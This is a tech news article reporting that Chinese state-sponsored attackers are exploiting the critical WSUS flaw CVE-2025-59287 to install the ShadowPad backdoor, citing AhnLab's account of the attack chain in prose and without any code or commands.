- Chinese state-sponsored actors are exploiting CVE-2025-59287, a critical WSUS flaw that allows unauthenticated RCE with SYSTEM privileges
- AhnLab reports that attackers use PowerCat and certutil/curl to implement ShadowPad, a successor backdoor to PlugX
- Likely targets include the government, defense, telecommunications and critical infrastructure sectors.
Experts have warned that Chinese state-sponsored threat actors are actively exploiting a vulnerability in Microsoft Windows Server Update Services (WSUS) to spread malware.
As part of its October 2025 Patch Tuesday cumulative update, Microsoft addressed CVE-2025-59287, an “untrusted data deserialization” flaw found in Windows Server Update Service (WSUS). The flaw received a severity score of 9.8/10 (critical) as it apparently enables remote code execution (RCE) attacks. It can be abused in low complexity attacks, without user interaction, giving unauthenticated and unprivileged threat actors the ability to execute malicious code with SYSTEM privileges. In theory, it would allow them to pivot and infect other WSUS servers as well.
Shortly after, publicly available proof-of-concept (PoC) code was spotted, prompting Microsoft to also release an out-of-band (OOB) security update.
Used for ShadowPad implementation
Now, security researchers at the AhnLab Security Intelligence Center (ASEC) said they are seeing attacks against unpatched endpoints, hinting that it is the work of the Chinese.
“The attacker targeted Windows servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” the report reads. “They then used PowerCat, an open source PowerShell-based Netcat utility, to obtain a system shell (CMD). They then downloaded and installed ShadowPad using certutil and curl.”
ShadowPad is reported to be the successor to PlugX, a modular backdoor that was “widely used” by Chinese state-sponsored hacking collectives. It is deployed to target endpoints by DLL sideloading, via a legitimate binary called ETDCtrlHelper.exe.
We don’t know how many companies were attacked through WSUS, where they are, or what industries they operate in. However, if it is the work of the Chinese, it is against the government, military and defense, telecommunications or critical infrastructure.
“After proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”
WSUS allows IT administrators to manage patching of computers within their network.
Through Hacker News
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
